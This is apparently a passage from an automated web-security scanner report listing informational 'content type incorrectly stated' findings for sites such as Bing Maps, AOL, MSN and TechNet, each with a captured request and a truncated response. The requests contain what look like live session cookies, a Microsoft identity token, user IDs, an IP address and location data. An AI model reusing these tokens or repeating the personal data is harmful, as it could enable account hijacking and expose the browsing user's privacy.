Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031; takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; scrx=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 496

spewDrillDown(unescape("        Please%20select%20an%20option    Problem%20finding%20a%20business        Problem%20finding%20a%20business    Problem%20finding%20a%20location        Problem%20finding%20a%20location    Problem%20
...[SNIP]...
31.7. http://image3.pubmatic.com/AdServer/UPug  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:17 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 537

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
31.8. http://maps.slapi0.virtualearth.net/EntityDetails.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.slapi0.virtualearth.net
Path:   /EntityDetails.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /EntityDetails.ashx?eid=YN390x211438380&mkt=en-us&jsonp=87540 HTTP/1.1
Host: maps.slapi0.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/json; charset=utf-8
Expires: Sun, 27 Mar 2011 00:57:07 GMT
Last-Modified: Sat, 26 Mar 2011 00:57:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-TraceID: a6cb0df8d1b54b1f983462f67f350b9e
X-Ve-Server: BL2-01202-20110317.509-0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-BM-Srv: BL2M001202
Date: Sat, 26 Mar 2011 00:57:06 GMT
Content-Length: 916

ScriptUtility.CrossDomainExecutor.jsonpCallback('87540',Sys.Serialization.JavaScriptSerializer.deserialize('\x7b\x22Description\x22\x3a\x22Chuan Body \x2b Soul is a unique spa concept from Asia, featu
...[SNIP]...
31.9. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/sharepoint_inline.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /Portals/0/teams/sharepoint_inline.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 28 Jun 2010 17:34:13 GMT
Content-Length: 19715
Date: Sat, 26 Mar 2011 01:42:14 GMT
X-Varnish: 1939092830
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
31.10. http://microsoftcambridge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://microsoftcambridge.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 12 Feb 2009 05:02:14 GMT
Content-Length: 3638
Date: Sat, 26 Mar 2011 01:40:35 GMT
X-Varnish: 1939061757 1939061488
Age: 1
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: HIT

...... ..........&...........h.......(... ...@........................................j-..l0..k/..i,..j,..`...^...j...f(...L...r...q...Y..g*..i-...f...y...........X..i,......................j...k....
...[SNIP]...
31.11. http://microsoftcambridge.com/slideshow/Vertigo.small.xap  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://microsoftcambridge.com
Path:   /slideshow/Vertigo.small.xap

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /slideshow/Vertigo.small.xap HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sat, 26 Mar 2011 01:40:27 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Last-Modified: Mon, 06 Jul 2009 20:22:40 GMT
Content-Length: 134194

PK.........}.:Q.s^7..........AppManifest.xaml...`.I.%&/m.{J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".....|.4_..."_...E.l>.h...Gw.6.y.......US...i..;-.jzwog
...[SNIP]...
31.12. http://o.aolcdn.com/os_merge/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.multiauth-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&os=4 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 16 Mar 2011 00:09:53 GMT
Content-Type: text/plain
Content-Length: 77757
Vary: Accept-Encoding
Cache-Control: public, max-age=2592000
Expires: Mon, 25 Apr 2011 20:36:17 GMT
Date: Sat, 26 Mar 2011 20:36:17 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
31.13. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/makeRequest

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /gadgets/makeRequest?refresh=3600&url=http%3A%2F%2Ffcgadgets.appspot.com%2Fs%2Ff%3Fn%3D0.7041989131830633%26pageurl%3Dhttp%3A%2F%2Fwww.cloudscan.me%2F2011%2F03%2Fsmartermail-80-stored-xss-reflected-xss.html&httpMethod=GET&headers=&postData=&authz=&st=&contentType=DOM&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1300632449.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.2120303763.1300632449.1301068080.1301140357.4; __utmc=209791819; __utmb=209791819.1.10.1301140357

Response

HTTP/1.1 200 OK
Expires: Sat, 26 Mar 2011 12:51:51 GMT
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Sat, 26 Mar 2011 11:51:51 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 385
Server: GSE
Cache-Control: public,max-age=3600
Age: 1

throw 1; < don't be evil' >{"http://fcgadgets.appspot.com/s/f?n=0.7041989131830633&pageurl=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html":{"body":"\u003c?xml version=\"1
...[SNIP]...
31.14. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9?callback=BF_PARTNER.gate_response&cb=931 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=595733
Expires: Sat, 02 Apr 2011 18:05:15 GMT
Date: Sat, 26 Mar 2011 20:36:22 GMT
Connection: close

BF_PARTNER.gate_response(1301156169);
31.15. http://portalblog.aol.com/media/background_new.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://portalblog.aol.com
Path:   /media/background_new.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /media/background_new.gif HTTP/1.1
Host: portalblog.aol.com
Proxy-Connection: keep-alive
Referer: http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?icid=acmgreetingunauthfollowus
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171833374-Repeat%7C1364243833374%3B%20s_nrgvo%3DRepeat%7C1364243833377%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcommem%253D%252526pid%25253Dacm%25252520%2525253A%25252520main5%25252520AOL.com%252525205.0%25252520Main%252526pidt%25253D1%252526oid%25253Daol-jumpbar1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:26 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 980
Cache-Control: max-age=1800
Expires: Sat, 26 Mar 2011 21:06:26 GMT
Content-Type: image/gif

.PNG
.
...IHDR.............d.D.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE......................................................................................
...[SNIP]...
31.16. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TE&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 855
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8255284-T20670730-C98000000000038650
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:41:08 GMT
Content-Length: 855


//<![CDATA[
function getRADIds() { return{"adid":"98000000000038650","pid":"8255284","targetid":"20670730"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
31.17. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=18987408 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://advertising.microsoft.com/search-advertising?s_cid=us_bing_footer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=44502044936234,d=1297806164

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=18987408
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1844"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:59:46 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
31.18. http://sc1.maps.live.com/i/bin/20110317.509/action_item_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sc1.maps.live.com
Path:   /i/bin/20110317.509/action_item_bullet.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /i/bin/20110317.509/action_item_bullet.gif HTTP/1.1
Host: sc1.maps.live.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MWTMsgr=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; wlidperf=latency=230&throughput=13; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=63072000
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "0c26649ee4cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-BM-Srv: BL2M001202
Content-Length: 128
Age: 280507
Date: Sat, 26 Mar 2011 00:56:25 GMT
Last-Modified: Thu, 17 Mar 2011 12:22:44 GMT
Expires: Thu, 21 Mar 2013 19:01:18 GMT
Connection: keep-alive

.PNG
.
...IHDR..............J".....tEXtSoftware.Adobe ImageReadyq.e<..."IDATx.b|......555.......d...,    .`..;..U..^....IEND.B`.
31.19. http://technet.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; Sto.UserLocale=en-us; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine|en-us/library:3=en-us/subscriptions/downloads; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093009734:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:44:10 GMT
Content-Length: 339

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gra
...[SNIP]...
31.20. http://technet.microsoft.com/en-us/library/bb126093(n).aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb126093(n).aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /en-us/library/bb126093(n).aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/library/cc184906.aspx
